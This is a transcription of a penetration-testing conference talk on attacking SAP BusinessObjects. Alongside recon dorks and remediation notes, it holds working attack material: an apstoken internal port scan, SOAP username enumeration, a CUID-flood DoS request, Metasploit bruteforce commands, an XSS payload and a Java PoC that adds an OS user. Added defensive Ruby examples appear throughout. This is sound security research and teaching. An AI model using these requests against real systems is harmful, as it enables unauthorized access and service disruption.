Transcription
Hacking SAP BusinessObjects
Joshua 'Jabra' Abraham - jabra@rapid7.com
Willis Vandevanter - will@rapid7.com
09/22/10
Overview
- Methodology / Threat Model
- Reconnaissance / Discovery
- Attacking!
- Summary
Standard Disclaimer
Do not do anything contained within this presentation unless you have written permission!!
Who are We?
Joshua "Jabra" Abraham - Security Consultant/Researcher
- Penetration Testing, Web Application Audits and Security Research
- Bachelor of Science in Computer Science
- Contributes to the BackTrack LiveCD, BeEF, Nikto, Fierce, and PBNJ
- Speaker/Trainer at BlackHat, DefCon, ShmooCon, SANS Pentest Summit, OWASP Conferences, LinuxWorld, Infosec World, CSI and Comdex
- Twitter: http://twitter.com/jabra  Blog: http://spl0it.wordpress.com
Willis Vandevanter - Security Consultant/Researcher
- Penetration Tester and Security Researcher
- BSc in CS, Masters of CS in Secure Software Engineering
- Twitter: http://twitter.com/willis (two underscores!!)
Rapid7 Overview
- Vulnerability Management
- Open source projects
- Professional Services: Network Pentesting, Web Application Audits, Training, Deployment
Overview
- What we will discuss
- What we will not discuss
- Things to keep in mind
- Breaking stuff is cool
- Disclaimer
SAP Product Suite
- Enterprise Resource Planning
- Business Intelligence (BI)
- Business Suite: Customer Relationship Planning, Enterprise Resource Planning, Product Lifecycle Management, Supply Chain Management, Supplier Relationship Management
- R/3
- BusinessObjects
- Netweaver
Focus of this talk
- SAP BusinessObjects Enterprise XI (XI 3.2 is the latest version)
- 20,000 ft view: aggregating and analyzing vast amounts of data, along with presenting it and providing access to it via many interfaces
- Flexible, Scalable, and Accessible
BO BI Architecture Overview
Interfaces we focused on
Central Management Console
- Administrative interface to BO
- Access is provided via the web server (http://ip:6405/CmcApp)
- Authenticates against the Central Management Server
- Provides: user and group creation and management; server/services configuration; object rights, scheduling, security settings
Web Services
Provides:
- Session handling: auth, user privilege management
- Business Intelligence Platform: server administration, scheduling, etc.
- Report Engine: access reports (Crystal Reports, Web Intelligence, etc.)
- Query: build ad hoc queries
Service Oriented Architecture 101
- Think Object Oriented over XML
- Add this on top of HTTP
- That's SOA!
- Connect legacy systems
Diagram: Step 1) User Request -> Step 2) Web Service Request -> Step 3) Web Service Response -> Step 4) Web Server Response (back to the user)
SOAP 101
- Web Services: API in XML over HTTP
- OSI Layers 8, 9 and 10: Layer 8 - XML; Layer 9 - Security (WS-*); Layer 10 - SOAP
- "Wiz Dullz" (WSDLs): data definitions
- UDDIs: pointers
Threat Model
- Web Services in Transit
- Web Services Engine
- Web Services Deployment
- Web Services User Code
Reference: Hacking Web Services
SSL vs Message Security
SSL (point-to-point):
- All or nothing
- No fine grained control over portions of the application
- No audit trail
Message security (chained workflow):
- Ton of work!
- Add amounts of security per hop
- Audit trail
- Verify messages have not changed!
- Encrypt message body (admin attack)
Diagram: a message passed through Node 1 ... Node 5
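The slide contrasts SSL's hop-by-hop protection with message-level security that survives a chained workflow. The following is an added example, not code from the talk: each node verifies an HMAC over the message body and its audit trail, appends itself to the trail and re-signs before forwarding, so a change at any node is caught by the next one. A single shared key and JSON canonicalisation are assumptions made to keep the example short; a real deployment would use WS-Security signatures with per-node keys.

```ruby
require 'openssl'
require 'json'

# Added example (not from the talk): message-level integrity for a chained
# workflow. Every node verifies the HMAC over body + audit trail, appends its
# own audit entry and re-signs before forwarding. A shared key is an
# assumption for brevity; real deployments would use per-node WS-Security keys.
SHARED_KEY = 'constructed-demo-key-do-not-reuse'.freeze

# HMAC-SHA256 over the canonical (JSON) form of the protected fields.
def message_mac(message, key)
  protected_part = JSON.generate('body' => message['body'], 'audit' => message['audit'])
  OpenSSL::HMAC.hexdigest('SHA256', key, protected_part)
end

# Constant-time comparison so a forged tag cannot be guessed byte by byte.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def sign(message, key)
  message.merge('sig' => message_mac(message, key))
end

def verify(message, key)
  secure_equal?(message_mac(message, key), message['sig'].to_s)
end

# One hop: reject anything whose body or audit trail was altered in transit,
# otherwise record this node in the trail and re-sign for the next hop.
def process_at_node(message, node, key)
  raise "integrity failure at #{node}" unless verify(message, key)
  audit = message['audit'] + [{ 'node' => node, 'action' => 'verified' }]
  sign({ 'body' => message['body'], 'audit' => audit }, key)
end

# Sign the original message and pass it through every node in order.
def run_workflow(body, nodes, key)
  message = sign({ 'body' => body, 'audit' => [] }, key)
  nodes.each { |node| message = process_at_node(message, node, key) }
  message
end

if __FILE__ == $PROGRAM_NAME
  final = run_workflow('<GenerateCuids><numCuids>1</numCuids></GenerateCuids>',
                       %w[Node1 Node2 Node3 Node4 Node5], SHARED_KEY)
  puts "audit trail: #{final['audit'].map { |e| e['node'] }.join(' -> ')}"
  puts "tampered body verifies? #{verify(final.merge('body' => 'x'), SHARED_KEY)}"
end
```

Because the audit trail is covered by the MAC, a node cannot be silently removed from the trail either; with SSL alone, each hop terminates the protection and the next hop has no way to tell that the body it received is the one the user sent.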
Tools of the Trade
- SOAP QA testing tools: SOAPUI
- Favorite programming language: custom tools
- Proxies
- Our favorite: ...ethods-of quick-exploitation-of-blind ... 25.html
Custom Web Services Client

    #!/usr/bin/ruby -w
    # soap4r client (bundled with Ruby 1.8; the soap4r gem on newer Rubies)
    require 'soap/wsdlDriver'
    require 'pp'

    # WSDL URL from the slide is not recoverable from the transcription; placeholder
    wsdl = 'http://WSDL-URL-FROM-SLIDE/service?wsdl'
    driver = SOAP::WSDLDriverFactory.new(wsdl).create_rpc_driver
    # Log SOAP request and response
    driver.wiredump_file_base = "soap-log.txt"
    # Use Burp proxy for all requests
    driver.httpproxy = 'http://localhost:8080'
    # Call the GetQuote operation and print the parsed response
    response = driver.GetQuote(:symbol => 'MSFT')
    pp response
SOAPUI
BurpSuite
- Usage with Intruder
- Verify the PRNG - Sequencer
- Etc., etc.
X’s and O’s and Icebergs
Overview
- Methodology / Threat Model
- Reconnaissance / Discovery
- Attacking!
- Summary
Real-World Pentesting
Evil Attackers - Blackhats:
- Financially motivated
- Not limited by amount of time and/or resources
Pen testers - Whitehats:
- Context / goal focused (experience, 6th sense, etc.)
- Demonstrate real world risks, but limited by the time of the engagement
- A snapshot of the network/application at a point in time
Goal Oriented Pentesting
- Emulate Blackhats by using goals as motivation
- Doesn't replace experience / 6th sense elements
- Pentesting teams focus their efforts on critical weaknesses
- Non-technical methodology in which the process is the central focus
- Provides the best ROI for organizations when they conduct penetration assessments
Threat Model
- Lots of entry points; we examined a couple
- Different goals for different folks:
  - Unauthorized access to information
  - Remote exploitation of the BO server and internal pivot
  - Informational only (version fingerprinting, etc.)
Overview
- Methodology / Threat Model
- Reconnaissance / Discovery
- Attacking!
- Summary
Web Application Overview
- /CmcApp: administrator interface
- /dswsbobje: web services for BusinessObjects (not installed by default; requires deployment of a war)
- /InfoViewApp: querying interface
- /AnalyticalReporting: reporting interface
Reconnaissance
- External and internal enumeration
- Google dorks for identifying externally accessible instances
- Port and application based enumeration
- Version fingerprinting: browser based, web services based
Google Dorks
BusinessObjects - InfoViewApp interface:
- inurl:infoviewapp
Crystal Reports:
- filetype:cwr
- filetype:cwr inurl:apstoken
- filetype:cwr inurl:viewrpt
- inurl:apspassword
- filetype:cwr inurl:init
- inurl:opendoc inurl:sType
Um, anyone want a port scan internally?
Google: filetype:cwr inurl:apstoken
Internal port scanning (port 80):
    http://hostname/CrystalReports/viewrpt.cwr?id=ID&wid=WID&apstoken=internal:80@TOKEN
Port closed response:
    Server HOSTNAME:80 not found or server may be down (FWM 01003)
Internal port scanning (port 445):
    http://hostname/CrystalReports/viewrpt.cwr?id=ID&wid=WID&apstoken=internal:445@TOKEN
Port open response:
    # Unable to open a socket to talk to CMS HOSTNAME:445 (FWM 01005)
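The part of the apstoken before the "@" is the CMS host:port the report viewer connects to, which is why pointing it at internal:80 or internal:445 turns viewrpt.cwr into an internal port probe, and the FWM 01003 / FWM 01005 messages are the oracle. On the defending side the same fact makes the abuse easy to spot in web server logs: a viewrpt.cwr request whose apstoken names anything other than the real CMS is suspicious. The following is an added example, not code from the talk; the CMS allowlist and the Common Log Format lines are constructed for it.

```ruby
require 'cgi'

# Added example (not from the talk): flag viewrpt.cwr requests whose apstoken
# names a CMS host:port other than the real CMS. The prefix before '@' in the
# apstoken is the CMS address the viewer will connect to. Allowlist and log
# lines below are constructed for this example.
ALLOWED_CMS = { 'boecms.corp.example' => [6400] }.freeze

# Extract {host:, port:} from the apstoken of a viewrpt.cwr request, or nil
# when the request is not a viewrpt.cwr call or carries no usable token.
def apstoken_target(request_path)
  path, query = request_path.split('?', 2)
  return nil unless query && path.downcase.end_with?('/viewrpt.cwr')
  token = CGI.parse(query)['apstoken'].first          # CGI.parse URL-decodes %3A / %40
  return nil if token.nil? || !token.include?('@')
  host, port = token.split('@', 2).first.split(':', 2)
  { host: host, port: port.to_i }
end

def allowed_target?(target)
  ALLOWED_CMS.fetch(target[:host], []).include?(target[:port])
end

# Scan Common Log Format lines and return one finding per request that points
# the report viewer at a host/port outside the allowlist.
def suspicious_viewrpt_requests(log_text)
  findings = []
  log_text.each_line do |line|
    m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/)
    next unless m
    target = apstoken_target(m[3])
    next if target.nil? || allowed_target?(target)
    findings << { client: m[1], time: m[2], host: target[:host], port: target[:port] }
  end
  findings
end

# Constructed sample: one legitimate viewer request, two probes, one unrelated hit.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [22/Sep/2010:10:00:01 -0700] "GET /CrystalReports/viewrpt.cwr?id=123&wid=7&apstoken=boecms.corp.example%3A6400%40AbC HTTP/1.1" 200 5120
  198.51.100.9 - - [22/Sep/2010:10:00:02 -0700] "GET /CrystalReports/viewrpt.cwr?id=123&wid=7&apstoken=internal%3A80%40AbC HTTP/1.1" 200 310
  198.51.100.9 - - [22/Sep/2010:10:00:03 -0700] "GET /CrystalReports/viewrpt.cwr?id=123&wid=7&apstoken=internal%3A445%40AbC HTTP/1.1" 200 298
  10.0.0.5 - - [22/Sep/2010:10:00:04 -0700] "GET /InfoViewApp/logon.jsp HTTP/1.1" 200 2048
LOG

if __FILE__ == $PROGRAM_NAME
  suspicious_viewrpt_requests(SAMPLE_LOG).each { |f| puts f.inspect }
end
```

The same allowlist check belongs in front of the viewer itself (reject or rewrite any apstoken whose CMS part is not the configured CMS), and the small response sizes of the probe hits are a second signal worth alerting on alongside the host mismatch.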
Unique ...ng
- 8080/tcp
- /dswsbobje
Version Detection - Web
Request: /AnalyticalReporting merge web.xml
Response (snipped):
    <web-app>
      <context-param>
        <param-name>applet.version</param-name>
        <param-value>12.1.0.828</param-value>
      </context-param>
    </web-app>
Version Detection - Web Service
Request:
    POST ... HTTP/1.1

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="...1">
      <soapenv:Header/>
      <soapenv:Body>
        <ns:getVersion/>
      </soapenv:Body>
    </soapenv:Envelope>
Response:
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <getVersionResponse xmlns="...1">
          <Version>12.1.0</Version>
        </getVersionResponse>
      </soapenv:Body>
    </soapenv:Envelope>
MSFv3 Version Detection Module
    msf > use scanner/http/sap_businessobjects_version_enum
    msf auxiliary(sap_businessobjects_version_enum) > set RHOSTS 192.168.1.0/24
    msf auxiliary(sap_businessobjects_version_enum) > run
- Based on using Dswsbobje (8080/tcp)
- Web Service version request - unauthenticated
Username Enumeration
- Response tells you if the username is valid
- Valid username / invalid password
- SOAP method only
Username Enumeration
    POST /dswsbobje/services/session HTTP/1.1
    Content-Type: text/xml; charset=UTF-8
    SOAPAction: "...1/login"
    User-Agent: Axis2
    Host: x.x.x.x:8080
    Content-Length: 631

    <?xml version='1.0' encoding='UTF-8'?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <login xmlns="...1">
          <credential xmlns="...1" xmlns:ns="...1"
                      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                      Login="administrator" Password="PASSWORD1" xsi:type="ns:EnterpriseCredential"/>
          <version xmlns="...1">BOE XI 3.0</version>
        </login>
      </soapenv:Body>
    </soapenv:Envelope>
MSFv3 User Enumeration Module
    msf > use scanner/http/sap_businessobjects_user_enum
    msf auxiliary(sap_businessobjects_user_enum) > set RHOSTS 192.168.1.0/24
    msf auxiliary(sap_businessobjects_user_enum) > set USERNAME administrator
    msf auxiliary(sap_businessobjects_user_enum) > run
- Based on using Dswsbobje (8080/tcp)
- Web Service login request
Overview
- Methodology / Threat Model
- Reconnaissance / Discovery
- Attacking!
- Summary
Unique Identifier (CUID)
- CUIDs are used similarly to session ids for the tasks that are performed
- Ability to request a specific number of CUIDs
Denial of Service Attack
I'd like 100,000 CUIDs please!
    POST /dswsbobje/services/biplatform HTTP/1.1
    Content-Type: text/xml; charset=...
    ...ects.com/2007/06/01/GenerateCuids
DoS
    <?xml version='1.0' encoding='UTF-8'?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <GenerateCuids xmlns="...6/01">
          <SessionID xmlns="...6/01">itdirs8l4vkou4%3A6400 %40it-dirs8l4vkou4%3A6400 hkJg2K28oTJ1Nq osca%3Aiiop%3A%2F%2Fitdirs8l4vkou4%3A6400%3BSI SESSIONID%3D2148JfhkJg2K28oTJ1Nq en US America/LosAngeles</SessionID>
          <numCuids xmlns="...6/01">100000</numCuids>
        </GenerateCuids>
      </soapenv:Body>
    </soapenv:Envelope>
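The GenerateCuids body above is a plain SOAP request whose only attacker-controlled knob is numCuids, so a gateway or filter in front of /dswsbobje can enforce a cap before the request reaches the platform. The following is an added example, not code from the talk, of such a guard: it locates the operation inside soapenv:Body (the same way one would classify getVersion or login requests from the earlier slides) and rejects GenerateCuids calls above a policy limit. The namespace URIs are placeholders because the transcription truncates the real ones, and MAX_CUIDS is an assumed policy value.

```ruby
require 'rexml/document'

# Added example (not from the talk): a request-side guard that identifies the
# SOAP operation in the Body and rejects GenerateCuids calls asking for more
# CUIDs than a policy cap. Namespace URIs below are placeholders (the slide's
# transcription truncates them); MAX_CUIDS is an assumed policy value.
MAX_CUIDS = 100

# Name of the first element inside soapenv:Body, or nil if there is none.
def soap_operation(doc)
  body = REXML::XPath.first(doc, '//*[local-name()="Body"]')
  return nil unless body
  op = body.elements[1]            # REXML element indices are 1-based
  op && op.name                    # local name, prefix stripped
end

def inspect_soap_request(xml)
  doc = REXML::Document.new(xml)
  op = soap_operation(doc)
  return { operation: nil, verdict: :reject, reason: 'no operation in SOAP Body' } unless op
  return { operation: op, verdict: :allow } unless op == 'GenerateCuids'

  n = REXML::XPath.first(doc, '//*[local-name()="numCuids"]')
  count = n ? n.text.to_i : 0
  if count > MAX_CUIDS
    { operation: op, verdict: :reject, num_cuids: count,
      reason: "numCuids #{count} exceeds cap of #{MAX_CUIDS}" }
  else
    { operation: op, verdict: :allow, num_cuids: count }
  end
rescue REXML::ParseException => e
  # Malformed XML never reaches the platform either.
  { operation: nil, verdict: :reject, reason: "malformed XML: #{e.message.lines.first.to_s.strip}" }
end

# Constructed request modelled on the slide's GenerateCuids envelope
# (namespace placeholder: urn:example:biplatform).
def generate_cuids_request(num)
  <<~XML
    <?xml version='1.0' encoding='UTF-8'?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <GenerateCuids xmlns="urn:example:biplatform">
          <SessionID xmlns="urn:example:biplatform">constructed-session-id</SessionID>
          <numCuids xmlns="urn:example:biplatform">#{num}</numCuids>
        </GenerateCuids>
      </soapenv:Body>
    </soapenv:Envelope>
  XML
end

# Constructed request modelled on the slide's getVersion envelope.
GET_VERSION_REQUEST = <<~XML
  <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="urn:example:biplatform">
    <soapenv:Header/>
    <soapenv:Body><ns:getVersion/></soapenv:Body>
  </soapenv:Envelope>
XML

if __FILE__ == $PROGRAM_NAME
  puts inspect_soap_request(generate_cuids_request(100_000)).inspect
  puts inspect_soap_request(generate_cuids_request(10)).inspect
  puts inspect_soap_request(GET_VERSION_REQUEST).inspect
end
```

Matching on local-name() rather than on a fixed prefix matters here: the same operation arrives with different prefixes from different clients (soapenv:, soap:, default namespace), and a filter keyed on one spelling is trivially bypassed by another.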
Oracle SQL Injection Error Codes
Catch interesting errors:
- ORA-00921: unexpected end of SQL command
- ORA-00936: missing expression
- ORA-00933: SQL command not properly ended
- ORA-00970, ORA-00907, ORA-01756, ORA-00923, ORA-00900, PLS-00103, LPX-00601, ORA-00604
Crashes - for C code:
- ORA-03113 - might also be an instance crash
- ORA-03114, ORA-01012
- ORA-00600 - Internal
Reference: .../2008/12/UKOUG122008-slavik.pdf
MSFv3 User Bruteforce Module
    msf > use scanner/http/sap_businessobjects_user_brute
    msf auxiliary(sap_businessobjects_user_brute) > set RHOSTS 192.168.1.0/24
    msf auxiliary(sap_businessobjects_user_brute) > set USERNAME administrator
    msf auxiliary(sap_businessobjects_user_brute) > set PASSWORD password
    msf auxiliary(sap_businessobjects_user_brute) > run
- Based on using Dswsbobje (8080/tcp)
- Web Service login request
MSFv3 User Bruteforce Module (Web)
    msf > use scanner/http/sap_businessobjects_user_web
    msf auxiliary(sap_businessobjects_user_web) > set RHOSTS 192.168.1.0/24
    msf auxiliary(sap_businessobjects_user_web) > set USERNAME administrator
    msf auxiliary(sap_businessobjects_user_web) > set PASSWORD password
    msf auxiliary(sap_businessobjects_user_web) > run
- Based on using CmcApp (6405/tcp)
- Web Application login request
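The user enumeration and the two bruteforce modules above leave distinct traces on the server: enumeration is one client failing logons across many usernames in a short time, bruteforcing is one client failing repeatedly against one username, on either the SOAP session service or the CmcApp logon. The following is an added example, not code from the talk, that detects both patterns from a simplified logon audit stream. The event format (time, client IP, username, OK/FAIL, interface), the sample events and the thresholds are all constructed assumptions; a real deployment would feed it from the CMS auditing data.

```ruby
require 'time'

# Added example (not from the talk): detect username enumeration and password
# bruteforcing from a simplified, constructed logon audit stream. One line per
# logon event: ISO-8601 time, client IP, username, OK/FAIL, interface.
# Window and thresholds are assumed policy values.
def parse_logon_events(text)
  text.each_line.map do |line|
    ts, ip, user, result, iface = line.split
    next if iface.nil?                       # skip blank or truncated lines
    { time: Time.iso8601(ts), ip: ip, user: user, ok: result == 'OK', iface: iface }
  end.compact
end

# Sliding window over one client's failures (sorted by time). Returns the
# largest failure count and the largest distinct-username count seen in any
# span of `window` seconds.
def window_stats(failures, window)
  max_count = 0
  max_users = 0
  users = Hash.new(0)
  lo = 0
  failures.each_with_index do |ev, hi|
    users[ev[:user]] += 1
    while ev[:time] - failures[lo][:time] > window
      old = failures[lo][:user]
      users[old] -= 1
      users.delete(old) if users[old].zero?
      lo += 1
    end
    max_count = [max_count, hi - lo + 1].max
    max_users = [max_users, users.size].max
  end
  [max_count, max_users]
end

# Many distinct usernames failing from one client => enumeration;
# many failures from one client (any username mix) => bruteforce.
def detect_logon_abuse(events, window: 300, user_threshold: 5, attempt_threshold: 10)
  findings = []
  events.reject { |e| e[:ok] }.group_by { |e| e[:ip] }.each do |ip, evs|
    count, distinct = window_stats(evs.sort_by { |e| e[:time] }, window)
    findings << { ip: ip, kind: :username_enumeration, distinct_users: distinct } if distinct >= user_threshold
    findings << { ip: ip, kind: :password_brute_force, failures: count } if count >= attempt_threshold
  end
  findings
end

# Constructed sample: an enumeration run against dswsbobje, a bruteforce run
# against CmcApp, and a user who mistyped once and then logged on.
def sample_logon_events
  lines = []
  %w[admin guest sysadmin jsmith backup report].each_with_index do |user, i|
    lines << format('2010-09-22T10:00:%02dZ 10.0.0.9 %s FAIL dswsbobje', i * 10, user)
  end
  12.times { |i| lines << format('2010-09-22T11:00:%02dZ 10.0.0.7 administrator FAIL CmcApp', i * 4) }
  lines << '2010-09-22T12:00:00Z 10.0.0.3 jsmith FAIL CmcApp'
  lines << '2010-09-22T12:00:30Z 10.0.0.3 jsmith OK CmcApp'
  lines.join("\n")
end

if __FILE__ == $PROGRAM_NAME
  detect_logon_abuse(parse_logon_events(sample_logon_events)).each { |f| puts f.inspect }
end
```

The enumeration signal only exists because the SOAP login distinguishes a bad username from a bad password; closing that difference in the response removes the oracle, while the detection above still catches the remaining guessing traffic.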
Reflective Cross-Site Scripting
Request:
    GET /dswsbobje/axis2-admin/engagingglobally?modules="%3e%20%3cXSS%3e&submit=Engage HTTP/1.1
    Host: x.x.x.x:8080
    ...snip...
Response:
    ...snip...
    <p><font color="blue">The system is attempting to engage a module that is not available: "><XSS></font></p>
    ...snip...
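The response above echoes the modules parameter into the page body untouched, which is the whole bug. As an added example that is not code from the talk or from Axis2, here is that rendering pattern written out twice: once as the vulnerable string interpolation and once with the value HTML-escaped for its text context, plus an allowlist so that unknown module names are not reflected as anything other than escaped text. The module list is a constructed assumption.

```ruby
require 'cgi'

# Added example (not from the talk or from Axis2): the reflection pattern
# from the slide, vulnerable form and hardened form side by side. The
# deployed-module list is constructed for this example.
DEPLOYED_MODULES = %w[addressing soapmonitor].freeze

# Vulnerable: the user-controlled module name is interpolated into HTML as-is,
# so "><XSS> lands in the page as markup.
def render_engage_vulnerable(modules)
  "<p><font color=\"blue\">The system is attempting to engage a module that is not available: #{modules}</font></p>"
end

# Hardened: the value is HTML-escaped for text context (<, >, &, quotes), and
# only names on the allowlist change what the page says.
def render_engage_hardened(modules)
  safe_name = CGI.escapeHTML(modules.to_s)
  if DEPLOYED_MODULES.include?(modules)
    "<p>Module #{safe_name} engaged.</p>"
  else
    "<p><font color=\"blue\">The system is attempting to engage a module that is not available: #{safe_name}</font></p>"
  end
end

# Quick self-check a page author can run: does any raw tag survive in the
# output that did not come from the template itself?
def reflects_raw_markup?(rendered, user_value)
  rendered.include?(user_value) && user_value =~ /[<>"]/ ? true : false
end

if __FILE__ == $PROGRAM_NAME
  payload = '"><XSS>'
  puts render_engage_vulnerable(payload)
  puts render_engage_hardened(payload)
end
```

CGI.escapeHTML is the right tool for text and quoted-attribute contexts only; a value placed inside a script block or a URL needs the encoding for that context instead, so the first question when reviewing a reflection is always which context the value lands in.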
Persistent Cross Site Scripting
Remote Code Execution
- Cross-Site Scripting is great, but we want a shell!!
- CmcApp services for upload and exec: Input File Repository; Program Job Server (not enabled by default)
- To execute an exe, administrator credentials are required
CmcApp RCE
You can set program object specific logon details by editing the "Program Logon" property of an object. These authentication details are not required if the credentials have been globally set (Applications > CMC > Program Object Rights > "Schedule with the following Operating System Credentials").
Reference: CMC Help Index > program objects > Java programs > Authentication and program objects
CmcApp Steps for RCE
1. Log on to the server computer.
2. Go to Control Panel > Administrative Tools > Local Security Policy.
3. Under Security Settings click Local Policies and then click User Rights Assignment.
4. Add the domain user account to the following policies:
   a. Replace a process level token.
   b. Log on as a batch job.
   c. Adjust memory quotas for a process.
   d. Access this computer from the network (usually Everyone by default).
5. Go to the CCM and stop the Program Job Server.
6. Right-click Program Job Server and then click Properties.
7. Type the domain user account and password into the Log On As text box.
8. Now you can schedule a metric refresh.
Dswsbobje
- Provides web services for BusinessObjects
- Not installed by default
- Requires: deployment of a war; Tomcat interface
- Remember the Tomcat Manager vulnerability (tomcat/tomcat) -> Remote Code Execution
- Opens up a new ... /login
Dswsbobje (think: dsw-s-bobje)
- Ability to administer web services
- Modify web services
- Delete web services (already deployed)
- Add web services (hmm, that sounds handy!)
- Guess what... it is!
Remote Code Execution PoC

    package org.apache.axis2.axis2userguide;

    import java.io.IOException;

    // PoC from the talk: deployed as an Axis2 service, it runs an OS command
    // on the server when invoked.
    public class AddUser {
        public AddUser() {}

        public void main() {
            Process process;
            try {
                process = Runtime.getRuntime().exec("net user foo bar /add");
            } catch (IOException ioexception) {
                ioexception.printStackTrace();
            }
            return;
        }
    }
DEMO!
http://spl0it.org/files/talks/source_barcelona10/demo/RCE_SAP_BusinessObjects_Dswsbobje.html
RCE Attack / Recommendations
Attack requires the following:
- Dswsbobje is deployed (it is deployed if you are using SOA!)
- Default administrator credentials are still in place
- Restart of the Tomcat service after uploading the malicious web service
Recommendation - change the default credentials in:
    C:\Program Files\Apache Software ...f\axis2.xml
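Of the three preconditions listed, the default Axis2 administrator credentials are the one a defender can check mechanically. The following is an added example, not code from the talk: it reads an axis2.xml and reports whether the admin console's userName/password parameters (the parameter names Axis2 itself uses for its admin login) are still at the stock admin/axis2 values, blank, or short. The two axis2.xml fragments are constructed, and the 12-character minimum is an assumed policy value.

```ruby
require 'rexml/document'

# Added example (not from the talk): audit an Axis2 axis2.xml for the admin
# console defaults the attack relies on. The XML fragments are constructed;
# the parameter names userName/password are the ones Axis2 uses for its
# admin console. The 12-character minimum is an assumed policy value.
DEFAULT_AXIS2_ADMIN = { 'userName' => 'admin', 'password' => 'axis2' }.freeze
MIN_PASSWORD_LENGTH = 12

# Text of <axisconfig><parameter name="..."> or nil when absent.
def axis2_parameter(doc, name)
  el = REXML::XPath.first(doc, "/axisconfig/parameter[@name='#{name}']")
  el && el.text.to_s.strip
end

# Returns a list of human-readable findings; empty means nothing to fix.
def audit_axis2_admin(xml)
  doc = REXML::Document.new(xml)
  user = axis2_parameter(doc, 'userName')
  pass = axis2_parameter(doc, 'password')
  findings = []
  findings << 'admin userName is the Axis2 default (admin)' if user == DEFAULT_AXIS2_ADMIN['userName']
  findings << 'admin password is the Axis2 default (axis2)' if pass == DEFAULT_AXIS2_ADMIN['password']
  findings << 'admin password missing or blank' if pass.nil? || pass.empty?
  if pass && !pass.empty? && pass.length < MIN_PASSWORD_LENGTH
    findings << "admin password is shorter than #{MIN_PASSWORD_LENGTH} characters"
  end
  findings
end

# Constructed: an axis2.xml left at the stock values.
DEFAULT_AXIS2_XML = <<~XML
  <axisconfig name="AxisJava2.0">
    <parameter name="hotdeployment">true</parameter>
    <parameter name="hotupdate">false</parameter>
    <parameter name="userName">admin</parameter>
    <parameter name="password">axis2</parameter>
  </axisconfig>
XML

# Constructed: the same file after the credentials were changed.
HARDENED_AXIS2_XML = <<~XML
  <axisconfig name="AxisJava2.0">
    <parameter name="hotdeployment">true</parameter>
    <parameter name="hotupdate">false</parameter>
    <parameter name="userName">boe-ws-admin</parameter>
    <parameter name="password">Long-Random-Passphrase-2010</parameter>
  </axisconfig>
XML

if __FILE__ == $PROGRAM_NAME
  path = ARGV[0]
  xml = path ? File.read(path) : DEFAULT_AXIS2_XML
  findings = audit_axis2_admin(xml)
  puts(findings.empty? ? 'OK: no default admin credentials' : findings.map { |f| "FINDING: #{f}" })
end
```

Run it against the real file (`ruby audit_axis2.rb "C:\...\axis2.xml"`, path as installed) as part of the build checklist; it complements, rather than replaces, restricting who can reach /dswsbobje/axis2-admin at all.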
Summary / QA
- Technical methodology for pentesting SAP BusinessObjects
- Understanding SOAP / SOA is a large portion of hacking SAP BusinessObjects
- Security Advisory to be released October 12th (www.rapid7.com)
- Metasploit modules to be released October 12th (www.metasploit.com)
Comments/Questions?
Joshua "Jabra" Abraham
- Jabra aT spl0it d0t org
- Jabra aT rapid7 d0t com
- Company: http://www.rapid7.com
- Blog: http://spl0it.wordpress.com
- Twitter: http://twitter.com/jabra
Willis Vandevanter
- Will aT rapid7 d0t com
- Twitter: http://twitter.com/willis (two underscores!)
- Company: http://www.rapid7.com